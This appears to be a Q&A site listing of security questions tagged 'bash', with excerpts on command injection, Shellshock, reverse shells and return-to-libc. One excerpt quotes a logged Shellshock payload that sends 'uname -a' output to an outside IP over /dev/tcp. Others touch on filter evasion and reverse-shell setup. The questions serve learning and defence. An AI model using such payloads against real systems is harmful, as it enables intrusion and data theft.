Questions tagged [bash]

The Bourne-again shell (Bash) is a Unix shell. It lets the user run commands on the host machine as a text-based program. Questions using this tag should be related either to vulnerabilities of Bash or to the proper use of specific commands.

152 questions
4 votes, 1 answer

Is this bash command vulnerable to code injection?

I'm wondering if the following code is vulnerable to command injection in bash: sumo /bin/netflash -Uk $CONTROLED_OPTION 2>&1 I'm thinking since it's not included in " " it should be vulnerable but I'm not sure since I can't make the command…
Neolex
4 votes, 1 answer

What do you search for in Open Source code to be sure there isn't malicious code?

I realize the answers will be language specific, but I am curious what terms you would look for when checking something out on Github? I was looking for a remote administration tool that I could use with clients, and found some awesome ones, that…
Alan
4 votes, 1 answer

Run bash command when spaces and '`/\<>?&| are filtered?

I have some PHP code that runs bash commands, and it has a bug that may make it vulnerable to remote code execution. The executed command would be $(id), but if I execute any other command like ls -la the space is automatically replaced with -. I…
user2444995
4 votes, 2 answers

Safely decrypting an unsolicited/untrusted PGP message

I am accepting public security vulnerability reports for my website, and I publish my personal PGP (GPG) key to encourage people to encrypt their communications. Upon receiving an encrypted message, what is the best way to safely decrypt it? The…
jamieweb
4 votes, 2 answers

Security of only allowing a few vetted commands using $SSH_ORIGINAL_COMMAND

Using an authorized_keys forced command with ssh and a wrapper-script like this: #!/usr/bin/env bash case "$SSH_ORIGINAL_COMMAND" in /var/lib/authorized-scripts/*) $SSH_ORIGINAL_COMMAND ;; *) exit 1 ;; esac Can a malicious user…
Zulakis
4 votes, 0 answers

Address of environment variable different for each directory

I'm writing a return-to-libc attack for a school project. My script retrieves the system(), exit() and shell addresses as follows (it's a sh script that calls some c programs): Create the environment variable for the xh shell: export…
4 votes, 3 answers

Prevention of user's passwords being stored as plain text in bash history

Say I want to find the password of a linux user sudoer account. Assume he uses a strong password. Assume I have physical access to the machine. I can get hold of his passwd and shadow file and brute-force it for days, or simply get a copy of his…
daltonfury42
4 votes, 3 answers

Trying to create a reverse bind shell from Windows to Linux

I’m trying to create an encrypted reverse bind shell from my Windows machine to my Linux machine. Being totally new to penetration testing, I’m having a little bit of trouble. First, on my Linux (Kali) machine, I set up a listener on port 4444: ncat…
Henry F
3 votes, 1 answer

Why is it a terrible idea to implement restrictive measures in .bashrc?

Asking this because apparently there are multiple people who genuinely don't realize just how bad of an idea this is, and I want there to be a single, easy-to-find place for them to go / be sent.
Parthian Shot
3 votes, 1 answer

Strange apache log line

I just came across this entry on one of my servers: 213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/ > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo…
3 votes, 1 answer

Automating NIKTO scanner

I am working on NIKTO automation. I have a text file that contains a list of IP addresses along with their open ports. I have already made a nikto script. Script functionality: it takes IP addresses and then runs nikto on them. Question: I want to make…
FrOgY
3 votes, 1 answer

Bash Shellshock

I am trying to find out if my devices are vulnerable to bash shellshock. I have run the commands found on https://shellshocker.net. It seems my devices are both susceptible to only one of the vulnerabilities - Exploit 7 CVE-2014-6277, but I am not…
Courtney
3 votes, 1 answer

Shellshock and PHP fastcgi

I understand that running apache/mod_php is safe, but I haven't heard about the case of running php in fastcgi mode (via nginx/php5-fpm), so, anyone can confirm this is also safe?
Ryan
3 votes, 2 answers

Set-uid script wrappers, `system(3)` shellshock and Bash Function Import from Environment

Given that it is a frequent requirement to allow unprivileged users restricted access to privileged functions: Jobbing sysadmins sometimes provide this in the form of shellscripts, which are then invoked via a setuid wrapper, like so: int main() { …
Ben
3 votes, 3 answers

Export env variables on the server? (Shellshock)

I was just reading about Shellshock and how it works. From what I understood it exploits the fact that the code is being executed even after the export of the function definition which is exported as an env variable. Why isn't the fact that you can…